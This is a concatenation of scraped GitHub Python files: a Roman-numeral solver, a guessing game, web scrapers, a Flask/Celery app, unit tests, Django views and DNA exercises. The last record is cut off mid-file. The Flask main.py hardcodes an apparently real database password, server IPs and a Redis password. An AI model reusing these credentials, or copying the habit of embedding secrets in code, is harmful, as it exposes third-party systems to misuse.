checkpoint\n    trainer.save_checkpoint(f\"checkpoints/{args.model}.ckpt\")\n","repo_name":"mwinterde/lightning-language-models","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"27341300818","text":"## The representation uses the largest possible symbols from left to right.\n## Greedy\n\n## Time Complexity: O(1) since there is a finite set of values and the corresponding\n## roman numerals to iterate through.\n## Space Complexity: O(1) - the amount of memory used does not change with the size\n## of the input integer\nclass Solution:\n    def intToRoman(self, num):\n        '''\n        :type num: int\n        :rtype: str\n        '''\n        # Sequences must be in order from largest to smallest\n        values = [1000, 900, 500, 400, 100, 90, 50, 40, 10, 9, 5, 4, 1]\n        symbols = ['M', 'CM', 'D', 'CD', 'C', 'XC', 'L', 'XL', 'X', 'IX', 'V', 'IV', 'I']\n\n        res = ''\n        for val, sym in zip(values, symbols):\n            res += (num // val) * sym\n            num %= val\n        return res\n","repo_name":"Shirleyxxy/lc-python-algorithms","sub_path":"medium/integer-to-roman.py","file_name":"integer-to-roman.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"72708124929","text":"# Import the random module\nimport random\n# Pick the secret random number between 1 and 100\nnum = random.randint(1, 100)\n# Initialize the attempt counter to 5\ncontador = 5\n\nprint(\"GUESS THE NUMBER FROM 1 TO 100\")\n# Ask the user for a number\nnumuser = int(input(\"Enter a number from 1 to 100: \"))\n# Compare:\n# while the guess is wrong and attempts remain,\n# show how many attempts are left and ask again\nwhile numuser != num and contador != 1:\n    contador = contador - 1\n    print(\"You have\", contador, \"attempts left\")\n    numuser = int(input(\"Enter a number from 1 to 100: \"))\n# Check the result after leaving the loop\n# The guess was right\nif numuser == num:\n    print(\"You got it, the number was:\", num)\n# Out of attempts without guessing\nelse:\n    print(\"You did not guess it, the number was:\", num)\n","repo_name":"aleexnl/aws-python","sub_path":"UF1/Nieto_Alejandro_Gomez_Alejandro_PT9/Ej2.py","file_name":"Ej2.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24893616141","text":"from mongoengine import NotUniqueError\nfrom pymongo.errors import DuplicateKeyError\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\n\nfrom app.db.db_engine import create_connection, create_index\nfrom app.models.cliente import Expediente, Cliente, Apoderado\nfrom app.selenium_impi.data import ids\n\n\ndef buscar_expediente(driver: Chrome, expediente: str):\n    url = 'https://acervomarcas.impi.gob.mx:8181/marcanet/vistas/common/datos/bsqExpedienteCompleto.pgi'\n    driver.get(url)\n    WebDriverWait(driver, 30).until(\n        ec.visibility_of_element_located((By.ID, '''frmBsqExp:expedienteId'''))).send_keys(expediente)\n    WebDriverWait(driver, 30).until(ec.element_to_be_clickable((By.ID, '''frmBsqExp:busquedaId2'''))).click()\n\n\ndef get_by_id(driver: Chrome, _id) -> str:\n    WebDriverWait(driver, 1).until(\n        ec.visibility_of_element_located((By.ID, 
_id)))\n\n text = driver.find_element_by_id(_id).text\n return text\n\n\ndef extraer_informacion_expediente(driver):\n expediente = None\n cliente = None\n apoderado = None\n datos_generales_numero_expediente = None\n datos_generales_fecha_presentacion = None\n datos_generales_fecha_publicacion_solicitud = None\n datos_generales_denominacion = None\n datos_generales_tipo_solicitud = None\n datos_titular_nombre = None\n datos_titular_direccion = None\n datos_titular_poblacion = None\n datos_titular_codigo_postal = None\n datos_titular_pais = None\n datos_titular_nacionalidad = None\n datos_titular_telefono = None\n datos_titular_email = None\n datos_apoderado_nombre = None\n datos_apoderado_direccion = None\n datos_apoderado_poblacion = None\n datos_apoderado_codigo_postal = None\n datos_apoderado_pais = None\n try:\n\n try:\n datos_generales_numero_expediente = get_by_id(driver, ids['datos_generales']['numero_expediente'])\n\n except:\n datos_generales_numero_expediente = None\n\n try:\n datos_generales_fecha_presentacion = get_by_id(driver, ids['datos_generales']['fecha_presentacion'])\n\n except:\n datos_generales_fecha_presentacion = None\n\n try:\n datos_generales_fecha_publicacion_solicitud = get_by_id(driver,\n ids['datos_generales'][\n 'fecha_publicacion_solicitud'])\n except:\n datos_generales_fecha_publicacion_solicitud = None\n\n try:\n datos_generales_denominacion = get_by_id(driver, ids['datos_generales']['denominación'])\n\n except:\n datos_generales_denominacion = None\n\n try:\n datos_generales_tipo_solicitud = get_by_id(driver, ids['datos_generales']['tipo_solicitud'])\n\n except:\n datos_generales_tipo_solicitud = None\n\n try:\n datos_titular_nombre = get_by_id(driver, ids['datos_titular']['nombre'])\n\n except:\n datos_titular_nombre = None\n\n try:\n datos_titular_direccion = get_by_id(driver, ids['datos_titular']['direccion'])\n\n except:\n datos_titular_direccion = None\n\n try:\n datos_titular_poblacion = get_by_id(driver, ids['datos_titular']['poblacion'])\n\n except:\n datos_titular_poblacion = None\n\n try:\n datos_titular_codigo_postal = get_by_id(driver, ids['datos_titular']['codigo_postal'])\n\n except:\n datos_titular_codigo_postal = None\n\n try:\n datos_titular_pais = get_by_id(driver, ids['datos_titular']['pais'])\n\n except:\n datos_titular_pais = None\n\n try:\n datos_titular_nacionalidad = get_by_id(driver, ids['datos_titular']['nacionalidad'])\n\n except:\n datos_titular_nacionalidad = None\n\n try:\n datos_titular_telefono = get_by_id(driver, ids['datos_titular']['telefono'])\n\n except:\n datos_titular_telefono = None\n\n try:\n datos_titular_email = get_by_id(driver, ids['datos_titular']['email'])\n\n except:\n datos_titular_email = None\n\n try:\n datos_apoderado_nombre = get_by_id(driver, ids['datos_apoderado']['nombre'])\n\n except:\n datos_apoderado_nombre = None\n\n try:\n datos_apoderado_direccion = get_by_id(driver, ids['datos_apoderado']['direccion'])\n\n except:\n datos_apoderado_direccion = None\n\n try:\n datos_apoderado_poblacion = get_by_id(driver, ids['datos_apoderado']['poblacion'])\n\n except:\n datos_apoderado_poblacion = None\n\n try:\n datos_apoderado_codigo_postal = get_by_id(driver, ids['datos_apoderado']['codigo_postal'])\n\n except:\n datos_apoderado_codigo_postal = None\n\n try:\n datos_apoderado_pais = get_by_id(driver, ids['datos_apoderado']['pais'])\n\n except:\n datos_apoderado_pais = None\n\n apoderado = Apoderado(\n nombre=datos_apoderado_nombre,\n direccion=datos_apoderado_direccion,\n 
poblacion=datos_apoderado_poblacion,\n codigo_postal=datos_apoderado_codigo_postal,\n pais=datos_apoderado_pais,\n )\n\n expediente = Expediente(\n denominacion=datos_generales_denominacion,\n numero_expediente=datos_generales_numero_expediente,\n fecha_presentacion=datos_generales_fecha_presentacion,\n fecha_publicacion=datos_generales_fecha_publicacion_solicitud,\n tipo_solicitud=datos_generales_tipo_solicitud,\n apoderado=apoderado,\n )\n\n cliente = Cliente(\n nombre=datos_titular_nombre,\n direccion=datos_titular_direccion,\n poblacion=datos_titular_poblacion,\n pais=datos_titular_pais,\n codigo_postal=datos_titular_codigo_postal,\n nacionalidad=datos_titular_nacionalidad,\n telefono=datos_titular_telefono,\n email=datos_titular_email,\n expedientes=[expediente]\n )\n cliente.save()\n\n except (DuplicateKeyError, NotUniqueError):\n cliente = Cliente.objects(nombre=datos_titular_nombre).get()\n cliente.expedientes.append(expediente)\n cliente.save()\n\n\ndef extract_expediente(driver: Chrome, lista_expedientes):\n create_connection()\n create_index()\n for expediente in lista_expedientes:\n try:\n buscar_expediente(driver, expediente)\n extraer_informacion_expediente(driver)\n\n except Exception as error:\n print(error)\n continue\n","repo_name":"usuarioMan/impi","sub_path":"app/selenium_impi/extraction_expedientes.py","file_name":"extraction_expedientes.py","file_ext":"py","file_size_in_byte":6824,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24455218772","text":"# -*- coding: utf-8 -*-\nimport importlib\nimport os\nimport sys\nfrom os.path import dirname, abspath, join\n\nimport urllib\n\nfrom celery import Celery\n\n\nsys.path.append(os.getcwd())\nPROJECT_DIR = dirname(dirname(abspath(__file__)))\nsys.path.insert(0, PROJECT_DIR)\n\n# from gptengine.extensions import swagger\nfrom gptengine.extensions import db, migrate, ma, redis_store\nfrom gptengine.settings import swagger_config, FLASK_PORT,DEBUG\nfrom gptengine.common.models import testmodel\nfrom gptengine.core.common_util import get_resource_path\nfrom logging.config import fileConfig\n\n# from flask_swagger_ui import get_swaggerui_blueprint\n# from jobs.extensions import apidoc\n# from gptengine.extensions import scheduler\nfrom flask import Flask, render_template\nimport logging\n# sys.path.append('/Users/charles/workspace/yr_prj/basin/tm/tm-gptengine/demo')\nlogger = logging.getLogger()\n\nCELERY_BROKER_URL = 'redis://localhost:6379/1'\nCELERY_RESULT_BACKEND = 'redis://localhost:6379/1'\nCELERYD_CONCURRENCY = 20\ncelery = Celery(__name__.split('.')[0], broker=CELERY_BROKER_URL)\n\ndef create_app(config_object='gptengine.settings'):\n \"\"\"An application factory, as explained here: http://flask.pocoo.org/docs/patterns/appfactories/.\n\n :param config_object: The configuration object to use.\n \"\"\"\n app = Flask(__name__.split('.')[0],\n template_folder=join(PROJECT_DIR, 'gptengine'),\n static_folder=join(PROJECT_DIR, 'gptengine', 'static'))\n app.config.from_object(config_object)\n register_logging(app)\n register_extensions(app)\n register_blueprints(app)\n # register_errorhandlers(app)\n # register_shellcontext(app)\n # register_commands(app)\n\n return app\n\n\ndef init_shell(app):\n @app.cli.command(\"ishell\")\n def shell():\n # lazy import these modules as they are only used in the shell context\n from IPython import embed, InteractiveShell\n import cProfile\n import pdb\n\n main = importlib.import_module(\"__main__\")\n\n banner = f\"App: poi\"\n # 
from .constants.models import testmodel as models\n\n        ctx = main.__dict__\n        ctx.update(\n            {\n                **testmodel.__dict__,\n                \"session\": db.session,\n                \"pdb\": pdb,\n                \"cProfile\": cProfile,\n            }\n        )\n\n        with app.app_context():\n            ctx.update(app.make_shell_context())\n            InteractiveShell.colors = \"Neutral\"\n            embed(user_ns=ctx, banner2=banner)\n\n\ndef register_extensions(app):\n    \"\"\"Register Flask extensions.\"\"\"\n\n    # swagger.config = swagger_config\n    # swagger.init_app(app)\n\n    # bcrypt.init_app(app)\n    # cache.init_app(app)\n\n    # Database configuration\n    # app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:pa44w0rd@1.15.59.76/MyEducationSys?charset=utf8mb4'\n    app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://cqtest:%s@106.52.100.60/test?charset=utf8mb4' % (urllib.parse.quote('Pa44w0rd!@#$'))\n    app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True\n    app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\n    app.config['CELERY_BROKER_URL'] = 'redis://1.15.59.76:6379/1'\n    app.config['CELERY_RESULT_BACKEND'] = 'redis://1.15.59.76:6379/1'\n    app.config['REDIS_URL'] = 'redis://:foo@1.15.59.76:11080/1'\n    # Debug: echo the generated SQL statements\n    #app.config[\"SQLALCHEMY_ECHO\"] = True\n\n    db.init_app(app)\n    migrate.init_app(app, db)\n    init_shell(app)\n    ma.init_app(app)\n    redis_store.init_app(app)\n\n\n    celery.conf.update(app.config)\n    # csrf_protect.init_app(app)\n    # login_manager.init_app(app)\n    # debug_toolbar.init_app(app)\n    # migrate.init_app(app, db)\n    # webpack.init_app(app)\n    # apidoc.init_app(app)\n\n    # scheduler.init_app(app)\n    #\n    # scheduler.add_listener(my_listener,EVENT_ALL)\n    # scheduler.add_listener(my_listener,EVENT_ALL)\n    # scheduler.add_listener(my_listener,(EVENT_JOB_ADDED |\n    #                EVENT_JOB_REMOVED |\n    #                EVENT_JOB_MODIFIED |\n    #                EVENT_JOB_EXECUTED |\n    #                EVENT_JOB_ERROR |\n    #                EVENT_JOB_MISSED))\n\n    # app, config=swagger_config\n    # swagger.init_app(app)\n    # swagger.config=swagger_config\n    return None\n\n\nclass BadRequest(Exception):\n    \"\"\"Wrap a local error in an exception instance so it can be raised\"\"\"\n\n    def __init__(self, message, code=400, payload=None):\n        self.message = message\n        self.code = code\n        self.payload = payload\n\n    def to_dict(self):\n        return {\"code\": self.code,\n                \"message\": self.message,\n                \"data\": self.payload}\n\n\ndef register_errorhandlers(app):\n    \"\"\"Register error handlers.\"\"\"\n\n    def render_error(error):\n        \"\"\"Render error templates.\"\"\"\n        # If a HTTPException, pull the `code` attribute; default to 500\n        import traceback\n\n        error_code = getattr(error, 'code', 500)\n        logger.error(traceback.format_exc())\n        return render_template('{0}.html'.format(error_code)), error_code\n\n    def render_error1(error):\n        # return restful.params_error('required invalid! 
missing file')\n        return render_template('{0}.html'.format(500)), 500\n\n    for errcode in [401, 404, 500]:\n        app.errorhandler(errcode)(render_error)\n\n    # app.errorhandler(400)(handle_404_error)\n    # app.errorhandler(400)(custom_abord)\n    # app.register_error_handler(400,BadRequest)\n\n    return None\n\n\ndef register_logging(app):\n    abspath = os.path.abspath(os.path.dirname(__file__))\n    fileConfig(os.path.join(abspath, './logging_config.ini'))\n\n    # logger = logging.getLogger('thesis_train')\n    # app.logger.setLevel(logging.DEBUG)  # log level for the logging module; takes the highest precedence\n\n\ndef register_blueprints(app):\n    \"\"\"Register Flask blueprints.\"\"\"\n\n    # from gptengine.views.admin import admin\n    #\n    # app.register_blueprint(admin)\n\n    # from api.v1.resources.index import api\n    # app.register_blueprint(api, url_prefix='/api/v1/index')\n\n    from gptengine.api.v1 import api as api_1_0_blueprint\n    app.register_blueprint(api_1_0_blueprint, url_prefix='/api/v1')\n\n    # from gptengine.jobs import jobs as jobs_blueprint\n    # app.register_blueprint(jobs_blueprint, url_prefix='/api/v1')\n\n    # app.register_blueprint(swaggerui_blueprint, url_prefix=SWAGGER_URL)\n\n    # from gptengine.api.v1 import api2 as api2_1_0_blueprint\n    # app.register_blueprint(api2_1_0_blueprint, url_prefix='/api/v1')\n\n    # from gptengine.user.index import admin\n    # app.register_blueprint(admin)\n\n    return None\n\n\napp = create_app()\n\n# api1 = Api(app)  # Create a Flask-RESTPlus API\n# #\n# @api1.resource('/hello') # Create a URL route to this resource\n# class HelloWorld(Resource): # Create a RESTful resource\n#     def get(self): # Create GET endpoint\n#         parser = reqparse.RequestParser(bundle_errors=True)\n#         parser.add_argument('model_id', type=str, location=['form', 'json'], required=True, help=\"model_id is missing\")\n#         req = parser.parse_args()\n#         # return {'hello': 'world'}\n\n@app.route('/')\ndef index():\n    return render_template('index.html')\n\n\nif __name__ == \"__main__\":\n    # Only for debugging while developing\n    # scheduler.start()\n    app.run(host='0.0.0.0', debug=DEBUG, port=FLASK_PORT)\n","repo_name":"charlessoft/docAI","sub_path":"gptengine-app/gptengine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7406,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"10039266633","text":"#!/usr/bin/env python3\n\nimport unittest\nfrom experiment import Experiment\nfrom analysis import Analysis\nfrom browser import Browser\nfrom sample import Sample\nfrom dataset import Dataset\nfrom blueprint_json_hub import get_file_type \n\nclass SimpleDatasetTestCase(unittest.TestCase):\n    def setUp(self):\n        experiment = 'ERX00001'\n        sample_id = 'ERS00001'\n        experiment_attributes = { 'experiment_type':'total-RNA-Seq', 'experiment_ontology_uri':'-', 'reference_registry_id':'IHECRE00001',\n                                  'assay':'RNA-Seq' }\n        analysis_attributes = { 'analysis_group':'BLUEPRINT', 'alignment_software':'BWA', 'alignment_software_version':'0.7.7',\n                                'analysis_software':'MACS2', 'analysis_software_version':'2.0.10.20131216' }\n        type_browser_data = [ {'type':'signal','browser':{ 'primary':'true', 'big_data_url':'http://ftp.ebi.ac.uk/../.bw',\n                               'md5sum':'3a468fba40d81fd7615d8dfa197f72ed'},},\n                            ]\n        self.dataset = Dataset( experiment=experiment, sample_id=sample_id, experiment_attributes=experiment_attributes,\n                                analysis_attributes=analysis_attributes, type_browser_data=type_browser_data )\n    def test_dataset(self):\n        dataset_dict = self.dataset.get_dataset_block()\n        self.assertIn('ERX00001',dataset_dict)\n    \nclass 
SimpleExperimentTestCase(unittest.TestCase):\n\n def setUp(self):\n data = {'EXPERIMENT_TYPE':'total-RNA-Seq', 'EXPERIMENT_ONTOLOGY_URI':'-',\n 'REFERENCE_REGISTRY_ID':'IHECRE000001', 'ASSAY':'RNA-Seq', 'EXP_META':'E1'}\n self.experiment = Experiment( metadata=data )\n\n def test_exp_metadata(self):\n exp_data = self.experiment.get_experiment_data() \n self.assertEqual('total-RNA-Seq', exp_data['experiment_type']) \n\n\nclass SimpleAnalysisTestCase(unittest.TestCase):\n \n def setUp(self):\n data={ 'ANALYSIS_GROUP':'BLUEPRINT', 'ALIGNMENT_SOFTWARE':'BWA', 'ALIGNMENT_SOFTWARE_VERSION':'0.7.7', \n 'ANALYSIS_SOFTWARE':'MACS2','ANALYSIS_SOFTWARE_VERSION':'2.0.10.20131216'}\n self.analysis = Analysis( metadata=data ) \n \n def test_analysis_metadata(self):\n analysis_data = self.analysis.get_analysis_data()\n self.assertEqual('BWA', analysis_data['alignment_software'])\n\nclass SimpleBrowserTestCase(unittest.TestCase):\n def setUp(self):\n self.browser = Browser( primary='true', big_data_url='http://ftp.ebi.ac.uk/../.bw', md5sum='3a468fba40d81fd7615d8dfa197f72ed')\n \n def test_browser_metadata(self):\n browser_data = self.browser.get_browser_data()\n self.assertEqual('3a468fba40d81fd7615d8dfa197f72ed', browser_data['md5sum'])\n\nclass SimpleSampleTestCase(unittest.TestCase):\n def setUp(self):\n data = { 'DONOR_ID': 'A1', 'DONOR_AGE':'0 - 5', 'DONOR_HEALTH_STATUS':'NA', \n 'DONOR_SEX':'Female',\n 'DONOR_AGE_UNIT':'year', 'DONOR_LIFE_STAGE':'unknown', 'DONOR_ETHNICITY':'NA',\n 'SAMPLE_ONTOLOGY_URI':'http://url', 'MOLECULE':'genomic DNA', 'DISEASE':'None',\n 'BIOMATERIAL_TYPE':'Primary Cell', 'CELL_TYPE':'Monocyte' , 'CELL_LINE':'None'\n }\n self.sample = Sample( metadata=data, biomaterial_type='primary cell' )\n\n def test_sample_metadata(self):\n sample_data = self.sample.get_samples_data() \n self.assertEqual('Monocyte', sample_data['cell_type'])\n self.assertEqual('0-5', sample_data['donor_age'])\n self.assertNotIn('cell_line', sample_data)\n\nclass SimpleFileNameTypetest(unittest.TestCase):\n def test_file_name_type(self):\n plus_file_name='blueprint/data/homo_sapiens/GRCh38/venous_blood/S01H8C/effector_memory_CD8-positive_alpha-beta_T_cell_terminally_differentiated/RNA-Seq/MPIMG/S01H8C11.plusStrandMulti.star_grape2_crg.GRCh38.20160531.bw'\n (plus_type, plus_primary)=get_file_type(plus_file_name)\n self.assertEqual('signal_forward',plus_type) \n self.assertFalse(plus_primary)\n \n minus_file_name='blueprint/data/homo_sapiens/GRCh38/venous_blood/WR27/T-cell_Prolymphocytic_Leukemia/RNA-Seq/MPIMG/S016KW11.minusStrand.star_grape2_crg.GRCh38.20160531.bw'\n (minus_type, minus_primary)=get_file_type(minus_file_name)\n self.assertEqual('signal_reverse',minus_type)\n self.assertFalse(minus_primary)\n\n unstranded_file_name='blueprint/data/homo_sapiens/GRCh38/venous_blood/N00031407013221/monocyte_-_None/RNA-Seq/NCMLS/S00UFS11.signalMulti.star_grape2_crg.GRCh38.20150815.bw'\n (unstranded_type, unstranded_primary)=get_file_type(unstranded_file_name)\n self.assertEqual('signal_unstranded',unstranded_type)\n self.assertFalse(unstranded_primary)\n\n chip_bb_file_name='blueprint/data/homo_sapiens/GRCh38/venous_blood/S004JD/effector_memory_CD8-positive_alpha-beta_T_cell_terminally_differentiated/ChIP-Seq/NCMLS/S004JDH2.ERX406969.H3K36me3.bwa.GRCh38.broad.20150527.bb'\n (chip_type, chip_primary)=get_file_type(chip_bb_file_name)\n self.assertEqual('peak_calls', chip_type)\n self.assertTrue(chip_primary)\n\n\n\nif __name__ == '__main__':\n 
unittest.main()\n","repo_name":"avikdatta/JSON_trackhub","sub_path":"t/test_cases.py","file_name":"test_cases.py","file_ext":"py","file_size_in_byte":5090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"21926217845","text":"# bronnen/views.py\n\n# django\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse_lazy\nfrom django.contrib import messages\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views.generic import TemplateView, ListView, DetailView\nfrom django.views.generic.edit import FormView, CreateView, UpdateView, DeleteView\n\nfrom django.core.paginator import Paginator\n\n# local\nfrom .models import Bron, Betrokkene, Zaak\n#from .forms import BronForm\n\n# index view\n# classbased view \nclass indexView(TemplateView):\n    \"\"\"\n    Bronnen index page.\n\n    **Template:**\n\n    :template:`bronnen/index.html`\n    \"\"\"\n    template_name = \"bronnen/index.html\"\n\n    def get_context_data(self,*args, **kwargs):\n        context = super(indexView, self).get_context_data(*args,**kwargs)\n        context['title'] = 'Zoeksysteem-Index'\n        return context\n\n# all bronnen classbased\nclass all_bronnenView(ListView):\n    model = Bron\n    template_name = 'bronnen/all_bronnen.html'\n    context_object_name = 'bronnen_list'\n    paginate_by = 10\n\n    def get_context_data(self, **kwargs):\n        context = super(all_bronnenView, self).get_context_data(**kwargs)\n        context['title'] = 'Bronnen'\n        bronnen_list = Bron.objects.all().order_by('naam')\n        context['aantal'] = bronnen_list.count()\n        paginator = Paginator(bronnen_list, self.paginate_by)\n        page_number = self.request.GET.get('page')\n        bronnen_page = paginator.get_page(page_number)\n        page_count = \"a\" * bronnen_page.paginator.num_pages\n        context['page_count'] = page_count\n        return context\n\n# delete bron\ndef delete_bron(request, bron_id):\n    item = Bron.objects.get(id=bron_id)\n    item.delete()\n    return redirect('bronnen:all-bronnen')\n\n# all zaken classbased\nclass all_zakenView(ListView):\n    model = Zaak\n    template_name = 'bronnen/all_zaken.html'\n    context_object_name = 'zaken_list'\n    paginate_by = 10\n\n    def get_context_data(self, **kwargs):\n        context = super(all_zakenView, self).get_context_data(**kwargs)\n        context['title'] = 'Zaken'\n        zaken_list = Zaak.objects.all()\n        context['aantal'] = zaken_list.count()\n        paginator = Paginator(zaken_list, self.paginate_by)\n        page_number = self.request.GET.get('page')\n        zaken_page = paginator.get_page(page_number)\n        page_count = \"a\" * zaken_page.paginator.num_pages\n        context['page_count'] = page_count\n        return context\n\n\n# Zoeken view\ndef zoeken(request):\n    context = {}\n    if request.method == \"POST\":\n        betrokkene = request.POST['betrokkene']\n        if betrokkene is not None:\n            try:\n                betrokkene_zaak = Betrokkene.objects.filter(naam__contains = betrokkene).values()[0]\n                zaken_betrokkene = Zaak.objects.filter(betrokkene__naam__contains = betrokkene)\n                if zaken_betrokkene:\n                    messages.success(request, (\"search executed!\"))\n                    context['zaken_betrokkene'] = zaken_betrokkene\n                    context['betrokkene'] = betrokkene_zaak\n                    context['aantalzaken'] = zaken_betrokkene.count()\n                    context['wmozaken'] = zaken_betrokkene.filter(bron__naam__contains = 'WMO').count()\n            except:\n                messages.success(request, (\"no cases found for \" + betrokkene + \"!\"))\n            return render(request, 'bronnen/zoeken.html', context)\n        else:\n            messages.error(request, (\"There was an error logging in. 
Please Try Again...\"))\n return redirect('users:login')\n else:\n context ['title'] = 'Zoeken'\n return render(request, 'bronnen/zoeken.html', context)\n","repo_name":"CasperFicke/verwerkingenregister","sub_path":"bronnen/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"3911134510","text":"import os\nimport urllib3\nimport bs4\n\n\nPARENT = 'http://download-node-02.eng.bos.redhat.com/brewroot/packages/rh-amazon-rhui-client/'\nRHEL6 = '1.el6/noarch/'\nRHEL7 = '1.el7/noarch/'\nRHEL8 = '1.el8/noarch/'\nREGION_URL = 'https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html'\nVERSION=None\nreq = urllib3.PoolManager()\n\ndef get_latest_version():\n rpm_version = req.request('GET', PARENT)\n soup = bs4.BeautifulSoup(rpm_version.data, 'html.parser')\n latest = soup.find_all(\"a\")[-5].text\n print('Getting latest rpm version: ' + latest.split()[0])\n global VERSION\n VERSION=latest\n\ndef get_rhel6_rpms():\n if not VERSION:\n get_latest_version()\n rhel6_rpms = []\n rpm_page = req.request('GET', PARENT + VERSION + RHEL6)\n soup = bs4.BeautifulSoup(rpm_page.data, 'html.parser')\n endpoints = soup.find_all(\"a\")[5:-5]\n for link in endpoints:\n rhel6_rpms.append(link.text)\n print('RHEL6 RPMs to download: ')\n for rpm in rhel6_rpms:\n print(rpm)\n return rhel6_rpms\n\ndef get_rhel7_rpms():\n if not VERSION:\n get_latest_version()\n rhel7_rpms = []\n rpm_page = req.request('GET', PARENT + VERSION + RHEL7)\n soup = bs4.BeautifulSoup(rpm_page.data, 'html.parser')\n endpoints = soup.find_all(\"a\")[5:-5]\n for link in endpoints:\n rhel7_rpms.append(link.text)\n print('RHEL7 RPMs to download: ')\n for rpm in rhel7_rpms:\n print(rpm)\n return rhel7_rpms\n\ndef get_rhel8_rpms():\n if not VERSION:\n get_latest_version()\n rhel8_rpms = []\n rpm_page = req.request('GET', PARENT + VERSION + RHEL8)\n soup = bs4.BeautifulSoup(rpm_page.data, 'html.parser')\n endpoints = soup.find_all(\"a\")[5:-5]\n for link in endpoints:\n rhel8_rpms.append(link.text)\n print('RHEL8 RPMs to download: ')\n for rpm in rhel8_rpms:\n print(rpm)\n return rhel8_rpms\n\ndef get_regions():\n regions = []\n region_page = req.request('GET', REGION_URL)\n soup = bs4.BeautifulSoup(region_page.data, 'html.parser')\n td = 1\n while td < len(soup.table('td')):\n regions.append(soup.table('td')[td].text)\n td+=4\n return regions\n\n'''\nNeed to find a place to scrape archs and release versions\nHard coding for now\n'''\n\nif __name__ == \"__main__\":\n print(get_latest_version())\n print(get_rhel6_rpms())\n print(get_rhel7_rpms())\n print(get_rhel8_rpms())\n print(get_regions())","repo_name":"taftsanders/aws_rhui_package_validator","sub_path":"get_links.py","file_name":"get_links.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"1051758745","text":"my_dna = 'ACTGATCGATTACGTATAGTATTTGCTATCATACATATATATCGATGCGTTCAT'\ntmp1 = my_dna.replace('A', 'X')\ntmp2 = tmp1.replace('T', 'A')\ntmp3 = tmp2.replace('X', 'T')\ntmp4 = tmp3.replace('C', 'X')\ntmp5 = tmp4.replace('G', 'C')\ncomplement_dna = tmp5.replace('X','G')\n\nprint(my_dna)\nprint(complement_dna)\n\nrna = complement_dna.replace('T','U')\nprint(rna)\n\nAATable = 
{\n\t\"UUU\":'F',\"UUC\":'F',\"UUA\":'L',\"UUG\":'L',\"UCU\":'S',\"UCC\":'S',\"UCA\":'S',\"UCG\":'S',\n\t\"UAU\":'Y',\"UAC\":'Y',\"UAA\":'Stop',\"UAG\":'Stop',\"UGU\":'C',\"UGC\":'C',\"UGA\":'Stop',\"UGG\":'W',\n\t\"CUU\":'L',\"CUC\":'L',\"CUA\":'L',\"CUG\":'L',\"CCU\":'P',\"CCC\":'P',\"CCA\":'P',\"CCG\":'P',\n\t\"CAU\":'H',\"CAC\":'H',\"CAA\":'Q',\"CAG\":'Q',\"CGU\":'R',\"CGC\":'R',\"CGA\":'R',\"CGG\":'R',\n\t\"AUU\":'I',\"AUC\":'I',\"AUA\":'I',\"AUG\":'M',\"ACU\":'T',\"ACC\":'T',\"ACA\":'T',\"ACG\":'T',\n\t\"AAU\":'N',\"AAC\":'N',\"AAA\":'K',\"AAG\":'K',\"AGU\":'S',\"AGC\":'S',\"AGA\":'R',\"AGG\":'R',\n\t\"GUU\":'V',\"GUC\":'V',\"GUA\":'V',\"GUG\":'V',\"GCU\":'A',\"GCC\":'A',\"GCA\":'A',\"GCG\":'A',\n\t\"GAU\":'D',\"GAC\":'D',\"GAA\":'E',\"GAG\":'E',\"GGU\":'G',\"GGC\":'G',\"GGA\":'G',\"GGG\":'G',\n}\n\n#CALCULATING AT CONTENT\n\n#Here's a short DNA sequence:\n\n#ACTGATCGATTACGTATAGTATTTGCTATCATACATATATATCGATGCGTTCAT\n\n'''# ? Write a program that will print out the AT content of this DNA sequence (i.e. the proportion of bases that are either A or T). Hint: you can use normal mathematical symbols like add (+), subtract (-), multiply (*), divide (/) and parentheses to carry out calculations on numbers in Python.'''\n\nmy_string = 'ACTGATCGATTACGTATAGTATTTGCTATCATACATATATATCGATGCGTTCAT'\n\nnA = my_string.count('A')\nnC = my_string.count('C')\nnG = my_string.count('G')\nnT = my_string.count('T')\n\n# parentheses are required here: without them only nT is divided by the length\nresult = (nA + nT)/len(my_string)\nprint(result)\n\n\n\n#RESTRICTION FRAGMENT LENGTHS\n\n#Here's a short DNA sequence:\n\n#ACTGATCGATTACGTATAGTAGAATTCTATCATACATATATATCGATGCGTTCAT\n\n# ! The sequence contains a recognition site for the EcoRI restriction enzyme, which cuts at the motif G*AATTC (the position of the cut is indicated by an asterisk). \n#? Write a program which will calculate the size of the two fragments that will be produced when the DNA sequence is digested with EcoRI.\n\nmy_string = 'ACTGATCGATTACGTATAGTAGAATTCTATCATACATATATATCGATGCGTTCAT'\n\nfirst_len = 1 + my_string.find('GAATTC') \n\nsecond_len = len(my_string) - first_len\n\n\nprint(first_len) #22\nprint(second_len) #33\n\n\n\n###\n#SPLICING OUT INTRONS, PART ONE\n\n#Here's a short section of genomic DNA:\n\n#* DNA = 